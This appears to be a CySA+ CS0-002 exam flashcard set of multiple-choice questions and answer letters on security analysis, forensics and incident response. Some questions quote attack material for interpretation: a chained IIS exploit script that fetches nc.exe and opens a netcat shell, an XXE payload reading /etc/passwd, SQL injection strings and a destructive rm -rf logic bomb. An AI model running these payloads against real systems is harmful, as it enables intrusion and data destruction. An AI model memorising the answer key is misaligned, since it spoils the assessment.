CYSA+ CS0-002 Study Set 10/2022

Ace your homework & exams now with Quizwiz!

Which term defines the collection of all points from which an adversary could interact with a system and cause it to function in a way other than how it was designed? A. Attack surface B. Attack vector C. Adversary capability set D. Threat model

A

You are the first forensic analyst to arrive on the scene of a data breach. You have been asked to begin evidence collection on the server while waiting for the rest of your team to arrive. Which of the following evidence should you capture first? A. L3 cache B. Image of the server's SSD C. ARP cache D. Backup tapes

A

Alice is a security engineer tasked with performing vulnerability scans for her organization. She encounters a false positive error in one of her scans. What should she do about this? A. Verify that it is a false positive, and then document the exception. B. Implement a workaround. C. Update the vulnerability scanner. D. Use an authenticated scan, and then document the vulnerability.

A

An analyst reviews a triple-homed firewall configuration that connects to the internet, a private network, and one other network. Which of the following would best describe the third network connected to this firewall? A. Screened subnet B. Data zone C. Availability zone D. Staging environment

A

An analyst suspects that a trojan has victimized a Linux system. Which command should be run to determine where the current bash shell is being executed from on the system? A. which bash B. dir bash C. printenv bash D. ls -l bash

A

An organization utilizes a BYOD policy with its employees. This allows the employees to store sensitive corporate data on their personally owned devices. Which of the following occurred if an employee accidentally left their device in the back of a taxi? A. Failed deperimeterization management B. A data breach C. An advanced persistent threat D. Failed data loss prevention

A

Based on some old SIEM alerts, you have been asked to perform a forensic analysis on a given host. You have noticed that some SSL network connections are occurring over ports other than port 443. The SIEM alerts indicate that copies of svchost.exe and cmd.exe have been found in the host's %TEMP% folder. The logs indicate that RDP connections have previously connected with an IP address that is external to the corporate intranet, as well. What threat might you have uncovered during your analysis? A. APT B. DDoS C. Ransomware D. Software vulnerability

A

Raj is working to deploy a new vulnerability scanner for an organization. He wants to verify the information he gets is the most accurate view of the configurations on the organization's traveling salespeople's laptops to determine if any configuration issues could lead to new vulnerabilities. Which of the following technologies would work BEST to collect the configuration information in this situation? A. Agent-based scanning B. Passive network monitoring C. Server-based scanning D. Non-credentialed scanning

A

Which technique would provide the largest increase in security on a network with ICS, SCADA, or IoT devices? A. User and entity behavior analytics B. Installation of anti-virus tools C. Implement endpoint protection platforms D. Use of a host-based IDS or IPS

A

A company's NetFlow collection system can handle up to 2 Gbps. Due to excessive load, this has begun to approach full utilization at various times of the day. If the security team does not have additional money in their budget to purchase a more capable collector, which of the following options could they use to collect useful data? A. Enable QoS B. Enable NetFlow compression C. Enable sampling of the data D. Enable full packet capture

C

You are analyzing DNS logs looking for indicators of compromise associated with the use of a fast-flux network. You are already aware that the names involved in this particular fast-flux network are longer than 50 characters and always end in a .org top-level domain. Which of the following REGEGX expressions would you use to filter DNS traffic that matches this? A. \b[A-Za-z0-9\.-]{50,251}+.org B. \b[A-Za-z0-9\.\-]{50,251}+\.org C. \b(A-Za-z0-9\.\-){50,251}|\.org D. \b[A-Za-z0-9.-]{50,251}+.org

B

You are analyzing a Linux server that you suspect has been tampered with by an attacker. You went to the terminal and typed 'history' into the prompt and see the output: # echo 127.0.0.1 diontraining.com >> /etc/hosts Which of the following best describes what actions were performed by this line of code? A. Attempted to overwrite the host file and deleted all data except this entry B. Routed traffic destined for the diontraining.com domain to the localhost C. Added the website to the system's allow list in the hosts file D. Routed traffic destined for the localhost to the diontraining.com domain

B

A cybersecurity analyst is analyzing what they believe to be an active intrusion into their network. The indicator of compromise maps to suspected nation-state group that has strong financial motives, APT 38. Unfortunately, the analyst finds their data correlation lacking and cannot determine which assets have been affected, so they begin to review the list of network assets online. The following servers are currently online: PAYROLL_DB, DEV_SERVER7, FIREFLY, DEATHSTAR, THOR, and DION. Which of the following actions should the analyst conduct first? A. Conduct a Nessus scan of the FIREFLY server B. Logically isolate the PAYROLL_DB server from the production network C. Conduct a data criticality and prioritization analysis D. Hardening the DEV_SERVER7 server

C

A cybersecurity analyst is reviewing the logs of a proxy server and saw the following URL, https://www.google.com/search?q=*%40diontraining.com. Which of the following is true about the results of this search? A. Returns no useful results for an attacker B. Returns all web pages containing the text diontraining.com C. Returns all web pages containing an email address affiliated with diontraining.com D. Returns all web pages hosted at diontraining.com

C

A cybersecurity analyst just finished conducting an initial vulnerability scan and is reviewing their results. To avoid wasting time on results that are not related to actual vulnerabilities, the analyst wants to remove any false positives before remediating the findings. Which of the following is an indicator that something in their results would be a false positive? A. A scan result that shows a version that is different from the automated asset inventory B. An HTTPS entry that indicates the web page is securely encrypted C. Items classified by the system as Low or as For Informational Purposes Only D. A finding that shows the scanner compliance plug-ins are not up-to-date

C

A cybersecurity analyst working at a major university is reviewing the SQL server log of completed transactions and notices the following entry: "select ID, GRADE from GRADES where ID=1235235; UPDATE GRADES set GRADE='A' where ID=1235235; " Based on this transaction log, which of the following most likely occurred? A. The application and the SQL database are functioning properly B. The SQL server has insufficient logging and monitoring C. Someone used an SQL injection to assign straight A's to the student with ID #1235235 D. A student with ID #1235235 used an SQL injection to give themselves straight A's

C

A forensic analyst needs to access a macOS encrypted drive that uses FileVault 2. Which of the following methods is NOT a means of unlocking the volume? A. Retrieve the key from memory while the volume is mounted B. Acquire the recovery key C. Conduct a brute-force attack against the FileVault 2 encryption D. Extract the keys from iCloud

C

A recent vulnerability scan found several vulnerabilities on an organization's public-facing IP addresses. To reduce the risk of a breach, which of the following vulnerabilities should be prioritized for remediation? A. A cryptographically weak encryption cipher B. An HTTP response that reveals an internal IP address C. A buffer overflow that is known to allow remote code execution D. A website utilizing a self-signed SSL certificate

C

A salesperson's laptop has become unresponsive after attempting to open a PDF in their email. A cybersecurity analyst reviews the IDS and anti-virus software for any alerts or unusual behavior but finds nothing suspicious. Which of the following threats would BEST classify this scenario? A. RAT B. Ping of death C. Zero-day malware D. PII exfiltration

C

A software assurance laboratory performs a dynamic assessment on an application by automatically generating random data sets and inputting them to cause an error or failure condition. Which of the following is the laboratory performing? A. User acceptance testing B. Stress testing C. Fuzzing D. Security regression testing

C

After running an Nmap scan of a system, you receive scan data that indicates the following three ports are open: 22/TCP 443/TCP 1521/TCP What services commonly run on these ports? A. SMTP, NetBIOS, MySQL B. SSH, Microsoft DS, WINS C. SSH, HTTPS, Oracle D. FTP, HTTPS, MS-SQL

C

An organization has hired a cybersecurity analyst to conduct an assessment of its current security posture. The analyst begins by conducting an external assessment against the organization's network to determine what information is exposed to a potential external attacker. What technique should the analyst perform first? A. Technical control audits B. Intranet portal reviews C. Enumeration D. DNS query log reviews

C

An organization is conducting a cybersecurity training exercise. What team is Jason assigned to if he has been asked to monitor and manage the defenders' and attackers' technical environment during the exercise? A. Blue team B. Purple team C. White team D. Red team

C

As part of the reconnaissance stage of a penetration test, Kumar wants to retrieve information about an organization's network infrastructure without causing an IPS alert. Which of the following is his best course of action? A. Perform a DNS zone transfer B. Use a nmap stealth scan C. Perform a DNS brute-force attack D. Use a nmap ping sweep

C

Consider the following REGEX search string: \b(25[0-5]|2[0-4][0-9][01]?[0-9][0-9]?)\. (25[0-5]2[0-4][0-9][01]?[0-9][0-9]?)\. (25[0-5] 2 [0-4][0-9][01]?[0-9][0-9]?)\. (25[0-5]|2[0-4][0-9][01]?[0-9][0-9]?)\b Which of the following strings would NOT be included in the output of this search? A. 1.2.3.4 B. 001.02.3.40 C. 37.259.129.207 D. 205.255.255.001

C

DeepScan supports data-flow analysis and understands the execution flow of a program. It allows you to see possible security flaws without executing the code. Which of the following types of tools would DeepScan be classified as? A. Decompiler B. Fuzzer C. Static code analyzer D. Fault injector

C

Hilda needs a cost-effective backup solution that would allow for the restoration of data within a 24 hour RPO. The disaster recovery plan requires that backups occur during a specific timeframe each week, and then the backups should be transported to an off-site facility for storage. What strategy should Hilda choose to BEST meet these requirements? A. Configure replication of the data to a set of servers located at a hot site B. Conduct full backups daily to tape C. Create a daily incremental backup to tape D. Create disk-to-disk snapshots of the server every hour

C

In which phase of the security intelligence cycle is information from several different sources aggregated into useful repositories? A. Analysis B. Feedback C. Collection D. Dissemination

C

Jay is replacing his organization's current vulnerability scanner with a new tool. As he begins to create the scanner's configurations and scanning policy, he notices a conflict in the settings recommended between different documents. Which of the following sources must Jay follow when trying to resolve these conflicts? A. NIST guideline documents B. Configuration settings from the prior system C. Corporate policy D. Vendor best practices

C

Jonathan's team completed the first phase of their incident response process. They are currently assessing the time to recover from the incident. Using the NIST recoverability effort categories, the team has decided to predict the time to recover, but this requires additional resources. How should he categorize this using the NIST model? A. Non-recoverable B. Extended C. Supplemented D. Regular

C

Julie was just hired to conduct a security assessment of Dion Training's security policies. During her assessment, she noticed that many users were sharing group accounts to conduct their work roles. Julie recommended that the group accounts be eliminated and instead have an account created for each user. What improvement will this recommended action provide for the company? A. Increase password security B. More efficient baseline management C. Increase individual accountability D. More routing auditing

C

You are reverse engineering a malware sample using the Strings tool when you notice the code inside appears to be obfuscated. You look at the following line of output on your screen: ZWNobygiSmFzb24gRGlvbiBmcm9tIGh0dHBzOi8vd3d3LkRpb25 UcmFpbmluZy5jb20gY3JlYXRlZCB0aGlzIHBY YWN0aWNlIGV4YW OgcXVlc3Rpb24uIElmIHlvdSBmb3VuZCB0aGlzIHF1ZXN0aW9uI GluIHNvbWVvbmUgZWxzZSdzIGNvdXJZZSBvciBwcmFjdGljzsol eGFtcywgdGhleSBzdG9sZSBpdCEIKTs= Based on the output above, which of the following methods do you believe the attacker used to prevent their malicious code from being easily read or analyzed? A. SQL B. QR coding C. Base64 D. XML

C

You have been asked to conduct a forensic disk image on an internal 500 GB hard drive. You connect a write blocker to the drive and begin to image it using dd to copy the contents to an external 500 GB USB hard drive. Before completing the image, the tool reports that the imaging failed. Which of the following is most likely the reason for the image failure? A. The data cannot be copied using the RAW format B. The data on the source drive was modified during the imaging C. There are bad sectors on the destination drive D. The source drive is encrypted with BitLocker

C

A cybersecurity analyst is reviewing the logs of an authentication server and saw the following output: Begin Log: 443 get-form host: <website>.com login: jason password: password 443 get-form host: <website>.com login: jason password: CompTIA 443 get-form host: <website>.com login: jason password: 123456 443 get-form host: <website>.com login: jason password: qwerty End Log What type of attack was most likely being attempted by the attacker? A. Credential stuffing B. Password spraying C. Impersonation D. Brute force

D

A new alert has been distributed throughout the information security community regarding a critical Apache vulnerability. What action could you take to ONLY identify the known vulnerability? A. Perform an unauthenticated vulnerability scan on all servers in the environment B. Perform a web vulnerability scan on all servers in the environment C. Perform an authenticated scan on all web servers in the environment D. Perform a scan for the specific vulnerability on all web servers

D

Abdul's monitoring detects regular traffic sent from a system that is suspected to be compromised and participating in a botnet to a set of remote IP addresses. What is this called? A. Anomalous pings B. Probing C. Zombie chatter D. Beaconing

D

According to Lockheed Martin's white paper "Intel Driven Defense," which of the following technologies could degrade an adversary's effort during the C2 phase of the kill chain? A. Firewall ACL B. Anti-virus C. Port security D. NIPS

D

According to the NIST SP 800-115, during which phase of an attack would a penetration tester seek to gain complete control of a system? A. Discovery B. Planning C. Reporting D. Attack

D

While studying for your CompTIA CySA+ course at Dion Training, you decided to install a SIEM to collect data on your home network and its systems. You do not want to spend any money purchasing a license, so you decide to use an open-source option instead. Which of the following SIEM solutions utilize an open-source licensing model? A. Splunk B. ArcSight C. QRadar D. OSSIM

D

You are analyzing the following network utilization report because you suspect one of the servers has been compromised. IP Address Name Uptime Historical Current 192.168.20.2 web0i 7D 12H 32M 42.6 GB 44.1 GB 192.168.20.3 webdev02 4D 07H 12M 1.95 GB 2.13 GB 192.168.20.4 dbsvr01 12D_02H 46M 3.15 GB 24.6 GB 192.168.20.5 marketing01 2D_17H 18M 5.2 GB 4.9 GB Based on the report above, which of the following servers do you suspect has been compromised and should be investigated further? A. webdev02 B. marketing01 C. web01 D. dbsvr01

D

You need to determine the best way to test operating system patches in a lab environment before deploying them to your automated patch management system. Unfortunately, your network has several different operating systems in use, but you only have one machine available to test the patches on. What is the best environment to utilize to perform the testing of the patches before deployment? A. Purchase additional workstations B. Bypass testing and deploy patches directly into the production environment C. Sandboxing D. Virtualization

D

(This is a simulated performance-based question.) You are working as a help desk technician and received a call from a user who complains about their computer's performance has slowed down over the last week since they installed a new free video game on the computer. As part of your troubleshooting efforts, you enter the command prompt in Windows and run the following command: Microsoft Windows [Version 6.1.7601] Copyright © 2009 Microsoft Corporation. All rights reserved. C:\Windows\system32>netstat -anb Active Connections Proto Local Address Foreign Address State TCP 0.0.0.0:135 0.0.0.0:0 LISTENING TCP 0.0.0.0:445 0.0.0.0:0 LISTENING TCP 10.10.10.123:51232 64.59.12.54: 80 ESTABLISHED UDP 10.10.10.123:53 *.* svchost.exe svchost.exe C:\Windows\system32\ Based on the output provided, what type of malware may have been installed on this user's computer? A. RAT B. Keylogger C. Spam D. Worm

A

A company's NetFlow collection system can handle up to 2 Gbps. Due to excessive load, this has begun to approach full utilization at various times of the day. If the security team does not have additional money in their budget to purchase a more capable collector, which of the following options could they use to collect useful data? A. Enable sampling of the data B. Enable full packet capture C. Enable NetFlow compression D. Enable QoS

A

A cybersecurity analyst conducts an incident response at a government agency when she discovers that attackers had exfiltrated PII. Which of the following types of breaches has occurred? A. Privacy breach B. Proprietary breach C. Financial breach D. Integrity breach

A

A cybersecurity analyst is attempting to classify network traffic within an organization. The analyst runs the tcpdump command and receives the following output: $ tcpdump -n -i eth0 15:01:35.170763 IP 10.0.19.121.52497 > 11.154.12.121.ssh: P 105:157 (52) ack 18060 win 16549 15:01:35.170776 IP 11.154.12.121.ssh > 10.0.19.121.52497: P 23988:24136 (148) ack 157 win 113 15:01:35.170894 IP 11.154.12.121.ssh > 10.0.19.121.52497: P 24136: 24380 (244) ack 157 win 113 Which of the following statements is true based on this output? A. 10.0.19.121 is a client that is accessing an SSH server over port 52497 B. 11.154.12.121 is under attack from a host at 10.0.19.121 C. 11.154.12.121 is a client that is accessing an SSH server over port 52497 D. 10.0.19.121 is under attack from a host at 11.154.12.121

A

A cybersecurity analyst is reviewing the logs of a proxy server and saw the following URL, http://test.diontraining.com/index.php?id=1%20OR%2017-7%3d10. What type of attack has likely occurred? A. SQL injection B. Buffer overflow C. Session hijacking D. XML injection

A

A cybersecurity analyst notices the following XML transaction while reviewing the communication logs for a public-facing application that receives XML input directly from its clients: xml version="1.0" encoding="ISO-8859-1"?> !DOCTYPE xyz [ <ELEMENT XYZ ANY > <ENTITY abc SYSTEM "file:///etc/passwd" >]> <xyz>&abc;<xyz> Based on the output above, which of the following is true? A. An XML External Entity (XXE) vulnerability has been exploited and the attacker may have downloaded the passwd file. B. ISO-8859-1 only covers the Latin alphabet and may preclude other languages from being used. C. There is no concern since passwd does not contain any system passwords. D. The application is using parameterized queries to prevent XML injections.

A

A web developer wants to protect their new web application from an on-path attack. Which of the following controls would best prevent an attacker from stealing tokens stored in cookies? A. Setting the secure attribute on the cookie B. Hashing the cookie value C. Forcing the use of TLS for the web application D. Forcing the use of SSL for the web application

A

After analyzing and correlating activity from the firewall logs, server logs, and the intrusion detection system logs, a cybersecurity analyst has determined that a sophisticated breach of the company's network security may have occurred from a group of specialized attackers in a foreign country over the past five months. Up until now, these cyberattacks against the company network had gone unnoticed by the company's information security team. How would you best classify this threat? A. Advanced persistent threat (APT) B. Spear phishing C. Insider threat D. Privilege escalation

A

Consider the following snippet from a log file collected on the host with the IP address of 10.10.3.6. BEGIN LOG Time: Jun 12, 2020 09:24:12 Port:20 Source : 10.10.3.2 Destination:10.10.3.6 Protocol: TCP Time: Jun 12, 2020 09:24:14 Port:21 Source: 10.10.3.2 Destination:10.10.3.6 Protocol: TCP Time: Jun 12, 2020 09:24:16 Port:22 Source: 10.10.3.2 Destination:10.10.3.6 Protocol: TCP Time: Jun 12, 2020 09:24:18 Port:23 Source: 10.10.3.2 Destination:10.10.3.6 Protocol: TCP Time: Jun 12, 2020 09:24:20 Port:25 Source: 10.10.3.2 Destination:10.10.3.6 Protocol: TCP Time: Jun 12, 2020 09:24:22 Port:80 Source: 10.10.3.2 Destination: 10.10.3.6 Protocol: TCP Time: Jun 12, 2020 09:24:24 Port: 135 Source: 10.10.3.2 Destination:10.10.3.6 Protocol: TCP Time: Jun 12, 2020 09:24:26 Port:443 Source: 10.10.3.2 Destination:10.10.3.6 Protocol: TCP Time: Jun 12, 2020 09:24:26 Port:445 Source: 10.10.3.2 Destination:10.10.3.6 Protocol: TCP END LOG What type of activity occurred based on the output above? A. Port scan targeting 10.10.3.6 B. Port scan targeting 10.10.3.2 C. Fragmentation attack targeting 10.10.3.6 D. Denial of service attack targeting 10.10.3.6

A

James is working with the software development team to integrate real-time security reviews into some of their SDLC processes. Which of the following would best meet this requirement? A. Pair Programming B. Formal code review C. Tool-assisted review D. Pass-around code review

A

Joe wants to implement an authentication protocol that is well suited to untrusted networks. Which of the following options is best suited to his needs in its default state? A. Kerberos B. RADIUS C. LDAP D. TACACS+

A

Which of the following Wireshark filters should be applied to a packet capture to detect applications that send passwords in cleartext to a REST API located at 10.1.2.3? A. http.request.method=="POST" && ip.dst==10.1.2.3 B. ip.dst==10.1.2.3 C. http.request.method=="POST" D. ip.proto==tcp

A

Which of the following actions should you perform during the post-incident activities of an incident response? A. Perform evidence retention under the timescale defined by the regulatory or legal impact of the incident. B. Ensure confidentiality of the lessons learned report by not sharing it beyond the incident response team who handled the investigation. C. Create an incident summary reporting with in-depth technical recommendations for future resourcing and budgeting. D. Sanitize storage devices that contain any dd images collected to prevent liability arising from evidence collection.

A

Which of the following categories would contain information about a French citizen's race or ethnic origin? A. SPI B. PHI C. DLP D. PII

A

Which of the following command-line tools would you use to identify open ports and services on a host along with the version of the application that is associated with them? A. nmap B. Wireshark C. netstat D. ping

A

Which of the following ensures multi-threaded processing is conducted securely? A. Atomic execution B. Trusted execution C. Processor security extensions D. Secure enclave

A

Which of the following is NOT one of the main criteria included in a penetration testing plan? A. Account credentials B. Timing C. Authorization D. Scope

A

Which of the following provides a standard nomenclature for describing security-related software flaws? A. CVE B. SOX C. VPC D. SIEM

A

Which of the following roles should coordinate communications with the media during an incident response? A. Public relations B. Human resources C. System administrators D. Senior leadership

A

Which of the following techniques is an example of active monitoring? A. Ping B. RMON C. NetFlows D. A network tap

A

Which of the following techniques would allow an attacker to get a full listing of your internal DNS information if your DNS server is not properly secured? A. Zone transfers B. DNS poisoning C. FQDN resolution D. Split horizon

A

Which of the following techniques would be the most appropriate solution to implementing a multi-factor authentication system? A. Smartcard and PIN B. Fingerprint and retinal scan C. Username and password D. Password and security question

A

Which of the following vulnerabilities involves leveraging access from a single virtual machine to other machines on a hypervisor? A. VM escape B. VM data remnant C. VM migration D. VM sprawl

A

You are attending a cybersecurity conference and just watched a security researcher demonstrating the exploitation of a web interface on a SCADA/ICS component. This caused the device to malfunction and be destroyed. You recognize that the same component is used throughout your company's manufacturing plants. Which of the following mitigation strategies would provide you with the most immediate protection against this emergent threat? A. Evaluate if the web interface must remain open for the system to function; if it isn't needed, block the web interface B. Logically or physically isolate the SCADA/ICS component from the enterprise network C. Replace the affected SCADA/ICS components with more secure models from a different manufacturer D. Demand that the manufacturer of the component release a patch immediately and deploy the patch as soon as possible

A

You are conducting a quick nmap scan of a target network. You want to conduct an SYN scan, but you don't have raw socket privileges on your workstation. Which of the following commands should you use to conduct the SYN scan from your workstation? A. nmap -sT B. nmap -O C. nmap -sS D. nmap -sX

A

You are deploying OpenSSL in your organization and must select a cipher suite. Which of the following ciphers should NOT be used with OpenSSL? A. DES B. AES C. ECC D. RSA

A

You are working as a security analyst and are reviewing the logs from a Linux server. Linux:~ diontraining$ crontab −l 5 * * * * /usr/local/bin/backupscript.sh Linux:~ diontraining$ cat /usr/local/bin/backupscript.sh #~/bin/bash If ! Grep --silent jdion.usr /etc/passwd then rm -rf fi Based on the portion of the logs displayed here, what type of malware might have been installed on the server? A. Logic bomb B. Virus C. Ransomware D. Trojan

A

Your service desk has received many complaints from external users that a web application is responding slowly to requests and frequently receives a "connection timed out" error message when they attempt to submit information to the application. Which software development best practice should have been implemented to prevent this from occurring? A. Stress testing B. Input validation C. Regression testing D. Fuzzing

A

CIO has recently made a purchasing decision to install a new security appliance that will automatically sandbox all attachments as they enter the enterprise network to run dynamic and static code analysis on them. Which of the following questions about the appliance should you consider as the SOC manager responsible for operating this new appliance for the company? (SELECT FOUR) A. Does the new appliance provide a detailed report or alert showing why it believes an attachment is malicious? B. How will the appliance receive security patches and updates? C. Do you have security personnel and procedures in place to review the output from this appliance and take action where appropriate? D. Will the security appliance violate your employee's right to privacy? E. Will the device inadvertently alter anyone's data when it is analyzed in the sandbox? F. How will the appliance receive updated signatures and scanning engines?

ABCF

Which of the following will an adversary do during the installation phase of the Lockheed Martin kill chain? (SELECT FOUR) A. Timestomp a malware file to make it appear as if it is part of the operating system B. Install a webshell on a server C. Open two-way communications channel to an established C2 infrastructure D. Create a point of presence by adding services, scheduled tasks, or AutoRun keys E. Install a backdoor/implant on a client victim F. Collect user credentials

ABDE

Your organization's primary operating system vendor just released a critical patch for your servers. Your system administrators have recently deployed this patch and verified the installation was successful. This critical patch was designed to remediate a vulnerability that can allow a malicious actor to execute code on the server over the Internet remotely. You ran a vulnerability scan of the network and determined that all servers are still being reported as having the vulnerability. You verified all your scan configurations are correct. Which of the following might be the reason that the scan report still shows the servers as vulnerable? (SELECT ALL THAT APPLY) A. This critical patch did not remediate the vulnerability B. You conducted the vulnerability scan without waiting long enough after the patch was installed C. The vulnerability assessment scan is returning a false positive D. The wrong IP address range was scanned during your vulnerability assessment

AC

Which of the following will an adversary do during the exploitation phase of the Lockheed Martin kill chain? (SELECT THREE) A. Take advantage of a software, hardware, or human vulnerability B. A backdoor/implant is placed on a victim's client C. Wait for a user to click on a malicious link D. A webshell is installed on a web server E. Select backdoor implant and appropriate command and control infrastructure for operation F. Wait for a malicious email attachment to be opened

ACF

You are trying to find some files that were deleted by a user on a Windows workstation. What two locations are most likely to contain those deleted files? (Select two) A. Recycle bin B. Registry C. Unallocated space D. Slack space

AD

A SOC analyst has detected the repeated usage of a compromised user credential on the company's email server. The analyst sends you an email asking you to check the server for any indicators of compromise since the email server is critical to continued business operations. Which of the following was likely overlooked by your organization during the incident response preparation phase? A. Prepare a jump bag or kit for use in the investigation B. Develop a communications plan that includes provisions for how to operate in a compromised environment C. Conduct training on how to search for indicators of compromise D. Perform a data criticality and prioritization analysis

B

A penetration tester discovered a legacy web server running IIS 4.0 during their enumeration phase. The tester decided to use the msadc.pl attack script to execute arbitrary commands on the webserver. While the msadc.pl script is effective, and the pentester found it too monotonous to perform extended functions. During further research, the penetration tester found a Perl script that runs the following msadc commands: system("perl msadc.pl -h $host - \"echo $user>>tempfile\""); system("perl msadc.pl -h $host - \"echo $pass>>tempfile\""); system("perl msadc.pl -h $host -C \"echo bin>>tempfile\""); system("perl msadc.pl -h $host -C \"echo get nc.exe>>tempfile\""); system("perl msadc.pl -h $host -C \"echo get hacked.html>>tempfile\""); ("perl msadc.pl -h $host -C_\"echo quit>>tempfile\""); system("perl msadc.pl -h $host - \"ftp \-sl: tempfile\""); $o=; print "Opening FTP connection...\n"; system("perl msadc.pl -h $host - \"nc -l -p Sport -e cmd.exe""); Which exploit type is indicated by this script? A. Buffer overflow exploit B. Chained exploit C. Denial of Service exploit D. SQL injection exploit

B

A popular game allows for in-app purchases to acquire extra lives in the game. When a player purchases the extra lives, the number of lives is written to a configuration file on the gamer's phone. A hacker loves the game but hates having to buy lives all the time, so they developed an exploit that allows a player to purchase 1 life for $0.99 and then modifies the content of the configuration file to claim 100 lives were purchased before the application reading the number of lives purchased from the file. Which of the following type of vulnerabilities did the hacker exploit? A. Broken authentication B. Race condition C. Dereferencing D. Sensitive data exposure

B

Annah is deploying a new application that she received from a vendor, but she is unsure if the hardware is adequate to support a large number of users during peak usage periods. What type of testing could Annah perform to determine if the application will support the required number of users? A. User acceptance testing B. Load testing C. Fuzz testing D. Regression testing

B

Aymen is creating a procedure for the remediation of vulnerabilities discovered within his organization. He wants to ensure that any vendor patches are tested before deploying them into the production environment. What type of environment should his organization establish? A. Honeypot B. Staging C. Honeynet D. Development

B

Christina is auditing the security procedures related to the use of a cloud-based online payment service. She notices that the access permissions are set so that a single person can not add funds to the account and transfer funds out of the account. What security principle is most closely related to this scenario? A. Dual control authentication B. Separation of duties C. Least privilege D. Security through obscurity

B

Consider the following file called firewall.log that contains 53,682 lines that logged every connection going into and out of this network. The log file is in the following data format, as shown below with the first two lines of the log file: DATE, FACILITY, CHAIN, IN, SRC,DST,LEN, TOS, PREC, TTL,ID,PROTO, SPT,DPT Jan 11 05:33:59,1xl kernel: iptables, INPUT, eth0, 10.1.0.102,10.1.0.1,52,0x00,0x00,128,2242, TCP, 2564,23 Which of the following commands would display all of the lines from the firewall.log file that contain the destination IP address of 10.1.0.10 and a destination port of 23? A. grep "10.1.0.10," firewall.log | grep "23$" B. grep "10\.1\.0\.10\," firewall.log | grep "23$" C. grep "10.1.0.10," firewall.log | grep "23" D. grep "10\.1\.0\.10\," firewall.log | grep "23"

B

Dion Training wants to implement technology within their corporate network to BEST mitigate the risk that a zero-day virus might infect their workstations. Which of the following should be implemented FIRST? A. Anti-malware solution B. Application allow list C. Host-based firewall D. Intrusion detection system

B

During a vulnerability scan of your network, you identified a vulnerability on an appliance installed by a vendor on your network under an ongoing service contract. You do not have access to the appliance's operating system as the device was installed under a support agreement with the vendor. What is your best course of action to remediate or mitigate this vulnerability? A. Try to gain access to the underlying operating system and install the patch B. Contact the vendor to provide an update or to remediate the vulnerability C. Wait 30 days, run the scan again, and determine if the vendor corrected the vulnerability D. Mark the identified vulnerability as a false positive

B

Fail To Pass Systems has just been the victim of another embarrassing data breach. Their database administrator needed to work from home this weekend, so he downloaded the corporate database to his work laptop. On his way home, he left the laptop in an Uber, and a few days later, the data was posted on the internet. Which of the following mitigations would have provided the greatest protection against this data breach? A. Require all new employees to sign an NDA B. Require data at rest encryption on all endpoints C. Require data masking for any information stored in the database D. Require a VPN to be utilized for all telework employees

B

Fail to Pass Systems has suffered a data breach. Your analysis of suspicious log activity traced the source of the data breach to an employee in the accounting department's personally-owned smartphone connected to the company's wireless network. The smartphone has been isolated from the network now, but the employee refuses to allow you to image their smartphone to complete your investigation forensically. According to the employee, the company's BYOD policy does not require her to give you her device, and it is an invasion of their privacy. Which of the following phases of the incident response process is at fault for creating this situation? A. Eradication and recovery phase B. Preparation phase C. Detection and analysis phase D. Containment phase

B

In which phase of the security intelligence cycle is input collected from intelligence producers and consumers to improve the implementation of intelligence requirements? A. Analysis B. Feedback C. Dissemination D. Collection

B

Jamie's organization is attempting to budget for the next fiscal year. Jamie has calculated that the asset value of a database server is $120,000. Based on her analysis, she believes that a data breach to this server will occur once every four years and has a risk factor is 30%. What is the ALE for a data breach within Jamie's organization? A. $90,000 B. $9,000 C. $36,000 D. $360,000

B

Richard attempted to visit a website and received a DNS response from the DNS cache server pointing to the wrong IP address. Which of the following attacks has occurred? A. MAC spoofing B. DNS poisoning C. DNS brute-forcing D. ARP spoofing

B

What SCAP component provides a list of entries that contains an identification number, a description, and a public reference for each publicly known weakness in a piece of software? A. CPE B. CVE C. XCCDF D. CCE

B

Which of the following descriptions explains an integrity loss? A. Systems were taken offline, resulting in a loss of business income. B. Sensitive or proprietary information was changed or deleted. C. Protected information was accessed or exfiltrated. D. Sensitive personally identifiable information was accessed or exfiltrated.

B

Which of the following elements is LEAST likely to be included in an organization's data retention policy? A. Description of information that needs to be retained B. Classification of information C. Maximum retention period D. Minimum retention period

B

Which of the following is not a recognized adversarial attack vector according to the MITRE ATT&CK framework? A. Cyber B. Informational C. Human D. Physical

B

Which of the following is the correct usage of the tcpdump command to create a packet capture filter for all traffic going to and from the server located at 10.10.1.1? A. tcpdump -i eth0 dst 10.10.1.1 B. tcpdump -i eth0 host 10.10.1.1 C. tcpdump -i eth0 src 10.10.1.1 D. tcpdump -i eth0 proto 10.10.1.1

B

Which of the following methods could not be used to retrieve the key from a forensic copy of a BitLocker encrypted drive? A. Performing a FireWire attack on mounted drives B. Retrieving the key from the MBR C. Analyzing the hibernation file D. Analyzing the memory dump file

B

Which of the following must be combined with a threat to create risk? A. Mitigation B. Vulnerability C. Malicious actor D. Exploit

B

Which of the following policies should contain the requirements for removing a user's access when an employee is terminated? A. Data classification policy B. Account management policy C. Data retention policy D. Data ownership policy

B

Which of the following proprietary tools is used to create forensic disk images without making changes to the original evidence? A. Autopsy B. FTK Imager C. dd D. Memdump

B

Which of the following protocols could be used inside a virtual system to manage and monitor the network? A. EIGRP B. SNMP C. SMTP D. BGP

B

Which of the following provides the detailed, tactical information that CSIRT members need when responding to an incident? A. Guidelines B. Procedures C. Policies D. Framework

B

Which of the following types of output encoding is being used in the following output? <copyright symbol>2022 Dion Training aGVsbG8gd29ybGQNCg== A. ASCII B. Base64 C. XML D. Hex

B

Which of the following vulnerability scanning methods will provide the most accurate detail during a scan? A. Black box B. Authenticated C. Internal view D. External view

B

Which protocol is paired with OAuth2 to provide authentication of users in a federated identity management solution? A. SAML B. OpenID Connect C. ADFS D. Kerberos

B

Which type of personnel control is being implemented if Kirsten must receive and inventory any items that her coworker, Bob, orders? A. Mandatory vacation B. Separation of duties C. Background checks D. Dual control

B

You are in the recovery steps of an incident response. Your analysis revealed that the attacker exploited an unpatched vulnerability on a public-facing web server as the initial intrusion vector in this incident. Which of the following mitigations should be implemented first during the recovery? A. Disable unused user account and reset the administrator credentials B. Scan the network for additional instances of this vulnerability and patch the affected assets C. Restrict host access to peripheral protocols like USB and Bluetooth D. Restrict shell commands by user or host to ensure least privilege is followed

B

You are reverse engineering a piece of malware recovered from a retailer's network for analysis. They found that the malicious code was extracting track data from their customer's credit cards during processing. Which of the following types of threats would you classify this malware as? A. Ransomware B. POS malware C. Rootkit D. Keylogger

B

